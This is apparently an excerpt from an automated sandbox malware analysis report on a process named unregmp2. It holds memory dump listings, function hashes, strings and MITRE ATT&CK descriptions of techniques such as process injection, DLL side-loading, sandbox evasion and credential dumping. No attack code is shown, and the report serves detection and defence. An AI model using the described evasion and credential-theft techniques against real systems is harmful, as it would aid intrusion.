)*+,, xrefs: 0435BA3A
@@@@, xrefs: 0435BA4F
@@@@, xrefs: 0435BAE9
@@@@, xrefs: 0435BAD4
@@@@, xrefs: 0435BA56
@@@@, xrefs: 0435BB2F
@@@@, xrefs: 0435BB05
%&'(, xrefs: 0435BA33
@@@@, xrefs: 0435BA9C
@@@@, xrefs: 0435BA8E
@@@@, xrefs: 0435BB21
<=@@, xrefs: 0435B9D8
@@@@, xrefs: 0435BB13
@@@@, xrefs: 0435BAC6
?, xrefs: 0435BB40
@@@@, xrefs: 0435BA17
@@@@, xrefs: 0435BAF7
@@@@, xrefs: 0435BA87
@@@@, xrefs: 0435BA95
@@@@, xrefs: 0435BB0C
@@@@, xrefs: 0435BACD
@@@@, xrefs: 0435BA79
@@@@, xrefs: 0435BAE2
4567, xrefs: 0435B9CA
@@@@, xrefs: 0435BAAA
@@@@, xrefs: 0435BA5D
@@@@, xrefs: 0435BAF0
@@@@, xrefs: 0435BABF

Memory Dump Source

Source File: 00000007.00000002.3848238750.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4350000_unregmp2.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3558027158
Opcode ID: 43eb559cd07aca5cdfbbe0671a38cd4b689c261cf601b04c2cae4e7dec51fbce
Instruction ID: 336ac7c9933062d83b92c81581b4f2cbc45aac94e2f7d9ce3de630081815e014
Opcode Fuzzy Hash: 43eb559cd07aca5cdfbbe0671a38cd4b689c261cf601b04c2cae4e7dec51fbce
Instruction Fuzzy Hash: 029140F04082988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89458B85

Function 04572890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0457293C
___swprintf_l.LIBCMT ref: 0457295E
___swprintf_l.LIBCMT ref: 045729A3
___swprintf_l.LIBCMT ref: 045AA52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 045AA54E
ffff:, xrefs: 045AA504
:%u.%u.%u.%u, xrefs: 045AA5B8
::%hs%u.%u.%u.%u, xrefs: 045AA527

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: fe3c22457f1abf620b95d40a29ebab84ff1759fbb8d5570c6bf781b2f4fe308d
Instruction ID: 64cc20042361958eb82c1f755c8cc933c135a20163261ef85899aa6c5bfe2dee
Opcode Fuzzy Hash: fe3c22457f1abf620b95d40a29ebab84ff1759fbb8d5570c6bf781b2f4fe308d
Instruction Fuzzy Hash: 7F510AB5B00216BFDF10DF58A89097EF7B8BB48204B5481B9F455D3641E234FE50EBA0

Function 045E2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 045E24A6
___swprintf_l.LIBCMT ref: 045E24E2
___swprintf_l.LIBCMT ref: 045E257D
___swprintf_l.LIBCMT ref: 045E25A3
___swprintf_l.LIBCMT ref: 045E25C8
___swprintf_l.LIBCMT ref: 045E2608

Strings

ffff:, xrefs: 045E247D, 045E249D
::%hs%u.%u.%u.%u, xrefs: 045E249E
::ffff:0:%u.%u.%u.%u, xrefs: 045E24DA
:%u.%u.%u.%u, xrefs: 045E25FF

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 6a575d7d90009c481fa0602d9d334d3a74a3c4c49e941fabe2796af2657dff46
Instruction ID: b16a55a975de1d2991a278778fa6b3f1b63a5e724ff516378353d68a483c5c0a
Opcode Fuzzy Hash: 6a575d7d90009c481fa0602d9d334d3a74a3c4c49e941fabe2796af2657dff46
Instruction Fuzzy Hash: DA510971A00645AFDB28DF5DC99087EB7FCBB44204F04849AF496DB685EA74FA00E760

Function 04567630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

Execute=1, xrefs: 045A4713
ExecuteOptions, xrefs: 045A46A0
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 045A4742
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 045A4655
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 045A46FC
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 045A4725
CLIENT(ntdll): Processing section info %ws..., xrefs: 045A4787

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 415f3df13a3d84f559c2f4e811a7481428c0408d41aa5aebcb4901a1098d005f
Instruction ID: d1a9096ad010689a1687647171b68db66bacd630a832eac804b23e1b660ae191
Opcode Fuzzy Hash: 415f3df13a3d84f559c2f4e811a7481428c0408d41aa5aebcb4901a1098d005f
Instruction Fuzzy Hash: E951D9716002197BEF21AAA4EC85FAE77A8FF4D308F1404A9D506A7190E771BE45EF50

Function 04606940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: 1db98a7296225e58231edf0fbe0f2ba06797b2f685cf1638c3415d6fa08af921
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: ED02F3B1508342AFD709DF18C490A6BBBE5FFC8714F44892DF9894B2A4EB31E915CB52

Function 0457B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0457B6BF

Strings

0, xrefs: 0457B695
0, xrefs: 0457B66F
+, xrefs: 0457B65A
-, xrefs: 0457B650

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: f48fad9fd7657d47289218c8f7d4476c28d0d4ae971431d93a76c90d2ab5e998
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 4281B170E052499EDF248F68F8917FEBBB1BF45328F184679D861AB290D734B940EB50

Function 045E20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 045E214F
___swprintf_l.LIBCMT ref: 045E2172

Strings

%%%u, xrefs: 045E2146
[, xrefs: 045E212B
]:%u, xrefs: 045E2169

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 7cabf7d2df50e06a44bca9f6c942a8d0bbd45a3b10dea1dc91a0a6064f61a832
Instruction ID: 91f94f7c1d85e2963028773d2755253e94602e02c2c0a4083e419fee8d5fc397
Opcode Fuzzy Hash: 7cabf7d2df50e06a44bca9f6c942a8d0bbd45a3b10dea1dc91a0a6064f61a832
Instruction Fuzzy Hash: 3D215376A00119ABDB18DEB9D840ABE77ECFF44644F440166F905E3244E731AA05ABA1

Function 0455F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 045A02BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 045A02E7
RTL: Re-Waiting, xrefs: 045A031E

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 3e8ba898bbd2988b4a9f6eae7dc59eea82327ee5a7ed21849d5cd5be9a49b0d0
Instruction ID: d8ae8a56d696223e53f7008d7d0859e6320948b5020ea6a066ec9459360e8e8b
Opcode Fuzzy Hash: 3e8ba898bbd2988b4a9f6eae7dc59eea82327ee5a7ed21849d5cd5be9a49b0d0
Instruction Fuzzy Hash: 23E1CF316147419FD724CF28D894B2AB7E0BF88718F144A2EF9958B2E0E774F855EB42

Function 0456BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 045A7B7F
RTL: Resource at %p, xrefs: 045A7B8E
RTL: Re-Waiting, xrefs: 045A7BAC

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 29b64de206de86557f6f54bde88e0b115e532fb2012dc45b603fdcb09a7037c7
Instruction ID: 8c92f90192052aef6703d8fec4351a74fedcbfb7fed5ed83cc64a8ddd1ac5717
Opcode Fuzzy Hash: 29b64de206de86557f6f54bde88e0b115e532fb2012dc45b603fdcb09a7037c7
Instruction Fuzzy Hash: 2841D1353007069FD724DE29DC40B6AB7E5FB88714F100A2DE956DB690EB71F805AB91

Function 0456B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 045A728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 045A7294
RTL: Resource at %p, xrefs: 045A72A3
RTL: Re-Waiting, xrefs: 045A72C1

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 711ce23b68f84bbfc4b00281d7d7c66da994ae13b9ee72d1d22da99c17e69074
Instruction ID: bfe221d90ef0759945811afee108f3e0d18001eb68f6125f95cb95d880fa7ac2
Opcode Fuzzy Hash: 711ce23b68f84bbfc4b00281d7d7c66da994ae13b9ee72d1d22da99c17e69074
Instruction Fuzzy Hash: 6641D231700612ABD720DE24DC41F6EB7A6FF88718F104629F956EB240EB21F812EBD1

Function 045E2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 045E238D
___swprintf_l.LIBCMT ref: 045E23B3

Strings

%%%u, xrefs: 045E2384
]:%u, xrefs: 045E23AA

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: dafd7965c81fe6b72b9f4822745279f2a465bf0a491a061ce445950877a47e0e
Instruction ID: 68daa438e2bf9cc4e505940fd2592df5fbab358e16f8fa12cb524892a149a95a
Opcode Fuzzy Hash: dafd7965c81fe6b72b9f4822745279f2a465bf0a491a061ce445950877a47e0e
Instruction Fuzzy Hash: BD3157726002199FDB24DE29DC40BFE77BCFB44614F454596E849E3144EB30BA44AF61

Function 04577D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 04577E8B

Strings

+, xrefs: 04577DE8
-, xrefs: 04577DDD

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: e42920fcba9a948c198bc6681ffede40edbdb8b675c106614847c4b7d7f20d69
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 40918470E002169BDB24DE69F981ABEB7A5FF48720F54453AEC65E72D0E730B940A760

Function 04539126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 04539191
@, xrefs: 04539175

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 458a18bed86929f9d1509098a120733ee9fd82f661f67a6573883f97e088b7e8
Instruction ID: 7e490f50724629966b33b037b59d54dc0484dfaebd468406436783c4e7a95795
Opcode Fuzzy Hash: 458a18bed86929f9d1509098a120733ee9fd82f661f67a6573883f97e088b7e8
Instruction Fuzzy Hash: DB811BB2D00669ABDB35CF54CC44BEEB7B4BB48714F0045DAA919B7680E7706E84DFA0

Function 045BCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 045BCFBD

Strings

@, xrefs: 045BCF0A
@4Qw@4Qw, xrefs: 045BCFD5, 045BCFDA, 045BCFF1

Memory Dump Source

Source File: 00000007.00000002.3848341578.0000000004500000.00000040.00001000.00020000.00000000.sdmp, Offset: 04500000, based on PE: true

Associated: 00000007.00000002.3848341578.0000000004629000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000462D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3848341578.000000000469E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4500000_unregmp2.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Qw@4Qw
API String ID: 4062629308-2383119779
Opcode ID: 021213261ca1717e909c6d481200a76ac8493ea3a3d438b41370020956ae4a04
Instruction ID: 790929a2ea1ac56c97b8ca87848ff8a7a3850ac1cbfc5ca7c0dcffc937876d35
Opcode Fuzzy Hash: 021213261ca1717e909c6d481200a76ac8493ea3a3d438b41370020956ae4a04
Instruction Fuzzy Hash: 2641E771A00A29EFDB21DFA4D940AADB7B4FF84708F00446AE941DB350E734E844EF90

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
